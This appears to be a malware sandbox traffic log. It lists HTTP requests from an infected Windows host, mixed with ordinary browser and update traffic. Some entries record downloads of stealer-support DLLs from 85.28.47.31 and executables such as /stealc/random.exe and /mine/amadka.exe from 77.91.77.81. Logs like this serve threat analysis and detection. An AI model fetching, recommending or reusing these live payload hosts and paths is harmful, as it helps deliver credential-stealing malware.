                          Source: global trafficHTTP traffic detected: GET /crx/blobs/AVsOOGgL4EVsLTMzZa-C0yXaDVW5z6pCjWzx7YKwHb9PR6v117H2hbsZgQ2S3VrQetSMoK86b9iY-_-8nYIxIJD4BasJl9SD8IoqvPIbEK9wBlfqTusC6rL6yTYDfaVSn9sAxlKa5bRpPaxsFjcmEK7Nec5bVL7NZYhc/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_80_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /v4/api/selection?placement=88000360&nct=1&fmt=json&ADEFAB=1&OPSYS=WIN10&locale=en-GB&country=CH&edgeid=5518710994624701133&ACHANNEL=4&ABUILD=117.0.5938.150&poptin=0&devosver=10.0.19045.2006&clr=esdk&UITHEME=light&EPCON=0&AMAJOR=117&AMINOR=0&ABLD=5938&APATCH=150 HTTP/1.1Host: arc.msn.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.150"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.150", "Google Chrome";v="117.0.5938.150"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1722402874&P2=404&P3=2&P4=QeMQwWp2C6Q0ToOruoUw%2bGiGJE%2f0haB9wFH31GR9DJISupyTNXId4P6Tiwa5VCE%2fWXzF5dUyK7uMMTnFAi8Yig%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: F6l/Lp6r3WNuwVmeESVDJWSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /assets/domains_config_gz/2.8.75/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.55Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /assets/product_category_en/1.0.0/asset?assetgroup=ProductCategories HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ProductCategoriesSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=516=lPyAruD9e-CDhYYMzAqXh7uJetiSUku32Be908sANbztx0hyPUj2DOOAg-dmKupxPPU9b_smgCkEKJjmRv39lcHbXcM53rhYXKB6B2cNmyOJAVPm-xITR5PDWJMozAmjZ04qF5-sRBrIZLvTt32lN73ITl73JmsS7JYwytTjFFI
                          Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Kvu6flRNlG2X2Hs&MD=Y7YGDEsS HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /cost/go.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /cost/num.exe HTTP/1.1Host: 77.91.77.81
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 77.91.77.81
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: firefox.exe, 00000012.00000003.2802529831.000001E95775B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2740136811.000001E95775B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000012.00000003.2802529831.000001E95775B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2740136811.000001E95775B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
                          Source: firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
                          Source: 000003.log0.22.drString found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
                          Source: 000003.log0.22.drString found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
                          Source: 000003.log0.22.drString found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
